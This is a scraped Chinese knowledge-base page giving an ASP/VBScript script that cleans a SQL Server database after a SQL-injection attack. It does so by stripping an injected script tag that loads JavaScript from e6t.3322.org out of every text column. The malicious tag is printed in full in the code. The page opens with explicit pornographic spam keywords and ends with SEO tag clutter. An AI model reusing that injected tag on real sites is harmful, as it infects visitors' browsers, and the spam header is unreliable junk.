好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > 恢復 SQL 被注入后的數據代碼

恢復 SQL 被注入后的數據代碼

熱門標簽:漯河電銷回撥外呼系統 城市地圖標志怎么標注 硅基電話機器人官網 合肥crm外呼系統加盟 長沙外呼系統平臺 電話機器人怎么看余額 怎么修改高德地圖標注 西安電話自動外呼系統 美國地圖標注軟件下載
%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
!--#include file="Inc/conn.asp"-->
meta http-equiv="Content-Type" content="text/html; charset=gb2312">
%
server.ScriptTimeout = 1000000
'xtype=99 ntext 與text類型相似,不同的是,ntext類型采用unicode標準字符集。
'xtype=35 text 用于存儲大量文本數據。
'xtype=231 nvarchar 用來定義可變長度的二進制數據,最大長度為4000個字符。
'xtype=167 varchar 存儲最常可以達到8000個字符的變長的字符數據
str = "'script src="http://e6t.3322.org/c.js" src="http://e6t.3322.org/c.js">/script>'" '加在文本類型字段后的木馬代碼
sql = "SELECT a.name as t_name,b.name as c_name, b.xtype FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)"
set rs = conn.execute(sql)
while Not rs.eof
t_name = rs("t_name") '表名
c_name = rs("c_name") '字段名
xtype = rs("xtype") '字段類型
If (xtype = 99 Or xtype = 35) then
conn.execute("update [" + t_name + "] set [" + c_name + "]=replace(cast([" + c_name + "] as varchar(8000)), " + str + ", '')")
Else
conn.execute("update [" + t_name + "] set [" + c_name + "]=replace([" + c_name + "], " + str + ", '')")
End If
rs.movenext
wend
response.Write("已經初步清理了掛馬數據,請重新刷新頁面試試看!")
%>

標簽:玉溪 廣西 商洛 瀘州 文山 撫順 濟源 吉林

巨人網絡通訊聲明:本文標題《恢復 SQL 被注入后的數據代碼》,本文關鍵詞  恢復,SQL,被,注入,后的,數據,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《恢復 SQL 被注入后的數據代碼》相關的同類信息!
  • 本頁收集關于恢復 SQL 被注入后的數據代碼的相關信息資訊供網民參考!
  • 推薦文章